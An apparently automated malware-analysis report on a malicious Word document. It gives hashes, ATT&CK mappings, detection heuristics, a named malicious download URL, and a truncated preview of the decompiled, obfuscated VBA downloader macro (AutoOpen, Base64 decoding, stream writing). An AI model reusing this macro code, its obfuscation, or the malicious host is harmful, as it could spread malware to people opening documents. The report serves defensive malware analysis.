Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 471deece8db1af70…

MALICIOUS

Office (OLE)

Size: 163.5 KB
Created: 2017-05-03 10:18:00
Authoring application: Microsoft Office Word
First seen: 2017-05-13
MD5: 6f3d7488db57d2919fd1d482c461b60b
SHA-1: d30136774c5c9e7327e8a03ecd6e165988c31c33
SHA-256: 471deece8db1af70fb3efff350f2b423f876775d3a93a681dcd8d182846da0ca
Risk Score: 342

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1105 Ingress Tool Transfer

The sample contains a VBA macro with an AutoOpen function that is triggered upon opening the document. This macro utilizes a Base64-decoded Shell command stager to download and execute a payload from the URL http://cfarchitecture.be/zse7b-g437-hbn. The CreateObject and Shell() calls within the VBA code are indicative of malicious downloader behavior.

Heuristics (9)

  • ClamAV: Doc.Downloader.WithMacro-6310867-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.WithMacro-6310867-0
  • VBA macros detected [medium, 5 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    Shell() call in VBA
  • VBA Base64-decoded Shell command stager [critical] OLE_VBA_BASE64_SHELL_COMMAND_STAGER
    VBA auto-exec macro decodes Base64 string literals into command or script-launch text and executes the result with Shell. This catches cmd/cscript/PowerShell/VBS launchers hidden from plain keyword matching.
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    AutoOpen macro
  • CreateObject call [high] OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://cfarchitecture.be/zse7b-g437-hbn: referenced by macro
    • http://schemas.openxmlformats.org/drawingml/2006/main: in document text (OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 17119 bytes
SHA-256: 6b5182bc7ad5763eaf9f302c11c1ce2ffb2867f074ab4b78e29ee3e569c3d62b

Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
Sub AutoOpen()
Dim cg4Oh
cg4Oh = Val(bQIc8lOXr)
Dim V6uClqcZ As Byte
V6uClqcZ = 144
Dim GREpclBg As Integer
GREpclBg = 15554
yyNL1RFq
End Sub

Attribute VB_Name = "Module2"
Public Function VEQIr(ByVal GG1XPy)

Dim rUEu5N As Byte
rUEu5N = 8
Dim hXKFUTR0H As String
hXKFUTR0H = Val("U")
Dim YcgZu6 As Byte
YcgZu6 = 236
Dim kblsyI7Z As Double
kblsyI7Z = Sgn(13085.435893818)
Dim yVQaRok8 As Boolean
yVQaRok8 = False
Dim XvnDbRSo
Dim sNrwXdHTA

Dim qiuEZ As Integer
qiuEZ = 6364
Dim iXE68 As String
iXE68 = ""
Dim yDw0eS As Double
yDw0eS = 46955.458537291
Dim cADcSp As Byte
cADcSp = 89

Dim irzFC4tg As Long
irzFC4tg = 0
Dim izaf3 As Byte
izaf3 = 253
Dim bjEG79g As Long
bjEG79g = -1921307176
Dim etTbGmq As Long
etTbGmq = 0
Dim fXWdwa As Boolean
fXWdwa = False
Dim f21K8J As Boolean
f21K8J = False
Set XvnDbRSo = CreateObject("msxml2.domdocument")
Dim YXvtDkfrl As Single
YXvtDkfrl = Val(16874.922942528)
Dim SbcOKN As Integer
SbcOKN = Sgn(-19545)
Dim taF1OTi As Integer
taF1OTi = -4783
Dim TBEHUpY As Double
TBEHUpY = Sgn(43532.123687315)
Dim HKwhmu9 As Integer
HKwhmu9 = Sgn(25546)
Dim UNihLHe As Boolean
UNihLHe = False
Set sNrwXdHTA = XvnDbRSo.CreateElement(xMOA4)
Dim Sw29C As Single
Sw29C = Fix(59798.663272722)
Dim EmRrT94 As Integer
EmRrT94 = -24424
With sNrwXdHTA
Dim sIBqs
sIBqs = StrConv(QMyRn8N, vbProperCase)
Dim tcOk7
tcOk7 = AscW("w")
sNrwXdHTA.DataType = "bin." & xMOA4

Dim ZxLvjBlX As Byte
ZxLvjBlX = 94
Dim w6prJMHl As Byte
w6prJMHl = 156
Dim JzSsq As Byte
JzSsq = 184
sNrwXdHTA.Text = GG1XPy
End With

Dim j6gMGb5A As Integer
j6gMGb5A = -22473
Dim hcTgi2Aj7 As Integer
hcTgi2Aj7 = Sgn(15849)
Dim f6Zq42O0 As Single
f6Zq42O0 = Int(30448.500983016)
VEQIr = eweJpQM(sNrwXdHTA.nodeTypedValue)

Dim vq98byEKZ As Byte
vq98byEKZ = 9
Dim CJehs5 As Single
CJehs5 = Round(26221.041052182)
Set sNrwXdHTA = Nothing
Set XvnDbRSo = Nothing
End Function
Function eweJpQM(Binary)
Dim U5xYSKP
U5xYSKP = LCase(AYsjH)
Dim GmW75bUl As Single
GmW75bUl = Int(45841.938907585)
Dim aBtN0gwHY As Boolean
aBtN0gwHY = False
Dim Q7iy6 As Long
Q7iy6 = -208005992
Dim ONoxtjK As Boolean
ONoxtjK = False
Const YlSZD = 2
Const LCaXm = 1

Dim Boc2OSJv As Long
Boc2OSJv = -1214713290
Dim HxQ7Hph As Integer
HxQ7Hph = 26376
Dim cqKjgQzU3

Dim KayKtfFG As Byte
KayKtfFG = 134
Dim IjG4dJ As Integer
IjG4dJ = -31407
Dim B9pzaglV8
B9pzaglV8 = UCase(kLQdpD)
Dim UeUk1B4A9 As Long
UeUk1B4A9 = -829695066
Dim exRmVfM1 As Byte
exRmVfM1 = 6
Dim UJLg3H As Single
UJLg3H = Sgn(31514.649324993)
Dim KYis6Szj As Double
KYis6Szj = Sgn(30599.396877964)
Dim cbmlr As String
cbmlr = Val(sXmelRwE)
Dim XhzQmSG As Boolean
XhzQmSG = False
Dim ujogvz7 As Byte
ujogvz7 = 47
Set cqKjgQzU3 = CreateObject("adodb.stream")

Dim nn5Cz As Byte
nn5Cz = 71
Dim vC2Oc As Single
vC2Oc = 24887.595359496
Dim WwAWKVR As Boolean
WwAWKVR = True
Dim R5Z20GL1 As Boolean
R5Z20GL1 = True
Dim pV05v As String
pV05v = AscB("Y")
With cqKjgQzU3

Dim qSLpJP As Double
qSLpJP = 10799.038407675
Dim c38Majl As Long
c38Majl = Sgn(0)
.Type = LCaXm

Dim iCHtDB2 As Long
iCHtDB2 = 0
Dim NrCO4s As Byte
NrCO4s = 245
Dim JUMdJKE As Double
JUMdJKE = Sgn(54516.763744906)
Dim uUCt3 As Integer
uUCt3 = -13213
Dim dvtT9 As Integer
dvtT9 = Sgn(-19437)
.Open
Dim kRpJy As Integer
kRpJy = Sgn(775)
Dim yghIKiSRd
yghIKiSRd = Asc("8")
Dim yQ2pKMxq1 As Byte
yQ2pKMxq1 = 252
Dim rK9HxX87a As Boolean
rK9HxX87a = False
Dim oQwMNF As Single
oQwMNF = Sgn(18234.34037707)
.Write Binary

Dim mj0dD3tqG As Long
mj0dD3tqG = 0
Dim uFUmsO4z As Long
uFUmsO4z = -894386862
Dim xQqB805
xQqB805 = LTrim(HJ8Ka1A)
Dim dasASGUfP As Single
dasASGUfP = Sgn(47812.13930567)
.Position = 0

D
... (truncated)